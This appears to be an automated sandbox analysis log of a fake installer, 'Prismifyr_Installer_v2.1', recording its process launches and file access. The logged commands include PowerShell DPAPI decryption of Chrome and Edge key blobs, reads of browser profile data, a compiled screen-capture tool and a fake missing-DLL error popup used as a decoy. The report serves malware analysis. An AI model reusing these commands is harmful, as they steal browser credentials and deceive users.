Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Prismifyr_Installer_v2.1" --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2244,i,14912361022600860785,9095772362069922900,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2 Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Prismifyr_Installer_v2.1" --field-trial-handle=2516,i,14912361022600860785,9095772362069922900,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2512 /prefetch:3 Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')" Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')" Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png" " Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /fo csv Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E2A.tmp" "c:\Users\user\AppData\Local\Temp\screenCapture\CSCEE08CA83D7542AAB04A7698A66ECD4F.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "c:\users\user\appdata\local\programs\prismifyr_installer_v2.1\prismifyr_installer_v2.1.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\prismifyr_installer_v2.1" --gpu-preferences=uaaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaabaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=2244,i,14912361022600860785,9095772362069922900,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "c:\users\user\appdata\local\programs\prismifyr_installer_v2.1\prismifyr_installer_v2.1.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\prismifyr_installer_v2.1" --field-trial-handle=2516,i,14912361022600860785,9095772362069922900,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2512 /prefetch:3
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "start /b cmd /c mshta "javascript:new activexobject('wscript.shell').popup('the program can not start because msvcp140.dll is missing from your computer. try reinstalling the program to fix this problem.', 0, 'error', 16);close()""
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "c:\users\user\appdata\local\programs\prismifyr_installer_v2.1\prismifyr_installer_v2.1.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\prismifyr_installer_v2.1" --gpu-preferences=uaaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaabaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=2244,i,14912361022600860785,9095772362069922900,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2 Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "c:\users\user\appdata\local\programs\prismifyr_installer_v2.1\prismifyr_installer_v2.1.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\prismifyr_installer_v2.1" --field-trial-handle=2516,i,14912361022600860785,9095772362069922900,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2512 /prefetch:3 Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'currentuser')" Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'currentuser')" Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "start /b cmd /c mshta "javascript:new activexobject('wscript.shell').popup('the program can not start because msvcp140.dll is missing from your computer. try reinstalling the program to fix this problem.', 0, 'error', 16);close()"" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'currentuser')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'currentuser')
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: ..\..\third_party\webrtc\modules\desktop_capture\win\window_capture_utils.ccFail to create instance of VirtualDesktopManagerChrome_WidgetWin_Progman..\..\third_party\webrtc\modules\desktop_capture\cropping_window_capturer.ccWindow no longer on top when ScreenCapturer finishesScreenCapturer failed to capture a frameWindow rect is emptyWindow is outside of the captured displaySysShadowWebRTC.DesktopCapture.Win.WindowGdiCapturerFrameTime..\..\third_party\webrtc\modules\desktop_capture\win\window_capturer_win_gdi.ccWindow hasn't been selected: Target window has been closed.Failed to get drawable window area: Failed to get window DC: Failed to create frame.Both PrintWindow() and BitBlt() failed.Capturing owned window failed (previous error/warning pertained to that)WindowCapturerWinGdi::CaptureFrameWebRTC.DesktopCapture.BlankFrameDetectedWebRTC.DesktopCapture.PrimaryCapturerSelectSourceErrorWebRTC.DesktopCapture.PrimaryCapturerErrorWebRTC.DesktopCapture.PrimaryCapturerPermanentErrordwmapi.dllDwmEnableComposition..\..\third_party\webrtc\modules\desktop_capture\win\screen_capturer_win_gdi.ccFailed to capture screen by GDI.WebRTC.DesktopCapture.Win.ScreenGdiCapturerFrameTimedesktop_dc_memory_dc_Failed to get screen rect.Failed to create frame buffer.Failed to select current bitmap into memery dc.BitBlt failedScreenCapturerWinGdi::CaptureFrame..\..\third_party\webrtc\modules\desktop_capture\win\cursor.ccwebrtc::CreateMouseCursorFromHCursorUnable to get cursor icon info. Error = Unable to get bitmap info. Error = Unable to get bitmap bits. Error = `
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation Jump to behavior
